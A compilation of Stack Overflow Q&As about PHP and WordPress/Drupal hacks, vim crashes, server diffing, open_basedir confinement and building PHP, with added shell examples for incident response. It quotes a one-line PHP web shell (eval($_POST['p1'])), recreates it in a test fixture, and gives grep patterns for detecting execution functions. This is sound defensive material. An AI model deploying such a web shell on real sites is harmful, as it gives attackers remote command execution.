Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 6 years ago.
Is there a known way to hide PHP code within a file?
I got an error message referencing a malware variable in a PHP file on a WordPress website.
When I grep for the variable it shows me the malware in the file
When I open the file in nano it doesn't show
When I download via sftp the malware doesn't show in notepad++
I'm wondering if:
grep could somehow be seeing 'cached files'?
is there a way to hide PHP code?
has anyone using php or wordpress ever seen something like this?
I did everything to double check, yes these are the same files and all the other tips that were pointed out. opcache is off. I have no idea.
Removing face-palming situations from the equation (e.g. downloading the wrong file, downloading from a different server - which has happened to me before ;)), maybe you could try to use
grep -n [variable name]
to figure out the line (-n) where the variable is in the file. That might help you.
Another suggestion is downloading the file and using diff tools against a known good version of the infected file.
Closed 6 years ago.
I have a PHP file on my virtual Linux CentOS machine, and intermittently when I open it I get right away:
Vim: Caught deadly signal SEGV
Vim: Finished. Segmentation fault.
I tested that file many times; there are no hidden special characters of any kind. Moreover, if I open another PHP file, or for that matter any file, and open my troubled file from it (:e file_name), I can view it, edit and save without any problems.
Any suggestions what is wrong with that file and how to fix it?
Try the following command:
vim -u NONE <your_file>
It will launch vim without processing /etc/vimrc and ~/.vimrc.
If you are able to edit your file that way, then the problem is one of your vim plugins. Try disabling them one by one and see what happens.
Closed 7 years ago.
I got in trouble with some hackers: they hacked into our website, so I cloned our server to a new one and then reset the GitHub checkout on that server.
I heard that rsync can find out what is different between 2 servers. Is that possible with rsync? Can I export that list of files to a text file?
Thanks for your help; got hacked by using an old version of WordPress >_< I have been going crazy with this for the last couple of days.
The comment by Marty is good - the rsync command as written will do a dry-run (-n) to show you what files were added/deleted/changed between the $TARGET and $SOURCE locations so you can then inspect or diff them to see if there is any malicious code.
Additionally, in the past when I've dealt with hacked WordPress installs, it has been important to find the exploitation vector. Oftentimes PHP shells get uploaded via some insecure script or plugin, which gives the attacker a command-based web shell to view files, run commands, etc.
To find these files, the following command is helpful:
grep -E '((shell_)?exec|system|eval)' /path/to/wordpress/* -R
This might yield something like:
wpte.php: eval($_POST['p1']);
In this case, wpte.php was a malicious PHP shell script that got uploaded to one of my client's servers, which someone then used to run commands and upload more files. These scripts usually use one or more functions like eval or shell_exec to run commands input from the web shell.
Going from there, you can check the server access logs for hits to the malicious script and then further search the logs for the IP address(es) that accessed that script, to potentially find how they uploaded the script or what other resources they accessed.
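The procedure in this answer (compare against a known-good copy, grep for execution functions, then pivot through the access log) as an added example that is not part of the answer or of WordPress. The site tree, the known-good copy and the three log lines are constructed fixtures; the script name wpte.php comes from the answer, the plugin path is a placeholder, and diff -rq stands in for rsync's dry run.

```shell
# Constructed fixture: a tiny "site" tree with one benign file and one
# uploaded web shell, a known-good copy, and three fake access-log lines.
setup_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/site/wp-content/uploads" "$d/clean"
    printf '<?php $systemName = "wp"; echo "ok";\n' > "$d/site/index.php"
    cp "$d/site/index.php" "$d/clean/index.php"
    cat > "$d/site/wp-content/uploads/wpte.php" <<'EOF'
<?php eval($_POST['p1']);
EOF
    cat > "$d/access.log" <<'EOF'
203.0.113.5 - - [10/Oct/2000:13:50:01 -0700] "POST /wp-content/plugins/SOME-PLUGIN/upload.php HTTP/1.1" 200 45 "-" "curl/7.0"
203.0.113.5 - - [10/Oct/2000:13:55:36 -0700] "POST /wp-content/uploads/wpte.php HTTP/1.1" 200 12 "-" "curl/7.0"
198.51.100.7 - - [10/Oct/2000:14:00:00 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF
    echo "$d"
}

# Step 1: what differs from a known-good copy (diff -rq is the portable
# stand-in for rsync -n; both only report, never modify).
changed_files() { diff -rq "$1" "$2"; }

# Step 2: PHP files that call code/command execution functions. The leading
# group keeps identifiers such as $systemName from matching; \( is a literal
# parenthesis in ERE, so only an actual call is flagged.
find_suspicious_php() {
    grep -R -l -E --include='*.php' \
        '(^|[^A-Za-z0-9_])((shell_)?exec|system|eval)[[:space:]]*\(' "$1"
}

# Step 3: client IPs that requested a given script. In the combined log
# format field 1 is the client IP and field 7 is the request target.
hits_for_script() { awk -v s="$2" 'index($7, s) { print $1 }' "$1" | sort -u; }

# Step 4: everything else that IP requested, e.g. the upload path it used.
requests_from_ip() { awk -v ip="$1" '$1 == ip { print $7 }' "$2"; }
```

Run the four functions in order against the real webroot, a clean copy of the same release and the vhost's access log; the log fields shift if the log format is not Apache combined.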
Closed 7 years ago.
I got mail from Google Webmaster Tools that strange URLs were indexed, URLs like mywebsite.com/cheap-medicine/, etc.
I have a Drupal website and I can see those URLs are indexed. And using proxy I can see the page myself. However, I cannot find the source.
I have looked into a bunch of files but they are unchanged.
Also I searched my entire database and of course looked into Drupal backend for strange content.
I even searched my entire server using Linux grep, also no result for words on the page. The database URL / routing tables also show no strange URLs.
I did of course also check the .htaccess files.
How are these URLs accessible if I cannot find them anywhere?
Look into your .htaccess file, it contains a lot of power. It can make these strange URIs mask themselves. Try to check the validity of that file. This might be where this is coming from.
If your .htaccess file, or any .htaccess file inside any subdirectory of the site, wasn't hacked, then you probably want to reinstall the Drupal core. If you followed proper development practice by never editing third-party core files, then you will not lose any work or time, because it will be a fresh default copy of what you installed the first time.
After this, make sure core runs correctly in a default state, and that the problem is gone. Then you can copy back in your source files to your Drupal framework and reconfigure and resume.
If the problem comes back after you put your source files back, then the problem is in your sources.
You can also try grepping for the terms individually i.e. grep -rin "medicine" ./* on a GNU/Linux box to see if these terms show up.
Closed 8 years ago.
I have LAMP installed in my server and I use virtualhosts to map domains to subdirectories. I need to allow my customers to upload files (including php) to their server using FTP.
The problem is that a customer using a domain xxx.com.br uploaded a file test.php and executed it like:
xxx.com.br/test.php
The content of test.php is file_put_contents("../../xxx.txt","teste") and it worked! The file xxx.txt was created 2 levels above his domain folder! How do I prevent this from happening?
Don't give the PHP process access to directories it isn't meant to reach.
That's kind of the point of the whole permission system.
In Linux, PHP will generally run as its own user; just make sure that user doesn't have read or write permission to any files you don't want exposed.
For this purpose there is the open_basedir configuration directive. More information about it, for example, here.
Moreover, it is good to use FastCGI, which allows each script to be run under its owner. More information about it, for example, here.
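Both answers combined into one provisioning step, as an added example that is not from either answer: a per-customer PHP-FPM pool that runs that customer's scripts as their own Unix user with open_basedir confined to their tree, and the matching Apache vhost. The user, domain and /var/www layout are assumed, and the disable_functions line goes one step beyond the answers.

```shell
# Assumed layout per customer: $home/htdocs is the DocumentRoot, $home/tmp
# holds uploads and sessions, so open_basedir = $home/ covers both while
# "../../xxx.txt" from the question resolves outside it and is refused.
gen_fpm_pool() {   # $1 = unix user, $2 = domain, $3 = customer home dir
    cat <<EOF
[$2]
user = $1
group = $1
listen = /run/php-fpm/$2.sock
listen.owner = apache
listen.group = apache
pm = ondemand
pm.max_children = 5
; php_admin_value cannot be overridden by ini_set() or .user.ini
php_admin_value[open_basedir] = $3/
php_admin_value[upload_tmp_dir] = $3/tmp
php_admin_value[session.save_path] = $3/tmp
; shell-spawning functions a shared web host rarely needs
php_admin_value[disable_functions] = exec,passthru,shell_exec,system,proc_open,popen
EOF
}

gen_vhost() {   # $1 = domain, $2 = customer home dir
    cat <<EOF
<VirtualHost *:80>
    ServerName $1
    DocumentRoot $2/htdocs
    # hand .php to this customer's own pool via mod_proxy_fcgi
    <FilesMatch "\.php\$">
        SetHandler "proxy:unix:/run/php-fpm/$1.sock|fcgi://localhost"
    </FilesMatch>
    <Directory "$2/htdocs">
        Require all granted
    </Directory>
</VirtualHost>
EOF
}

# Example call for the question's customer (constructed user name):
#   gen_fpm_pool cust1 xxx.com.br /var/www/xxx.com.br > /etc/php-fpm.d/xxx.com.br.conf
#   gen_vhost xxx.com.br /var/www/xxx.com.br > /etc/httpd/conf.d/xxx.com.br.conf
```

The Unix user and the home directory (with htdocs and tmp, owned by that user) must exist before the pool starts; after reloading both services, the test.php from the question fails with an open_basedir restriction warning instead of writing the file.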
Closed 9 years ago.
I've been using PHP-5.4.3 for about a month now, and today I decided to make a switch to PHP-5.5.5. I downloaded the source code and placed it in C:/php (also renaming the folder php-5.5.5 to php), and I added the server variables as usual, C:/php/ <-- but here I got stuck. Usually I appended php.exe at the end, which was found inside the PHP folder, so I would be able to access PHP from the command line or start the built-in server, but now I can't find this file, and I can't find a way to start the server from the command line either.
You can compile PHP yourself. It's simply 2-4 commands and it's also explained. I can run configure, then make install. You can run configure --help to see all the options. It can be useful if you compile for FastCGI or need more space or a faster PHP.
The source code you downloaded needs to be built...
You can download a binary version from here (assuming you're using Windows, of course).
Or read this if you want to build it yourself. There are many other tutorials online.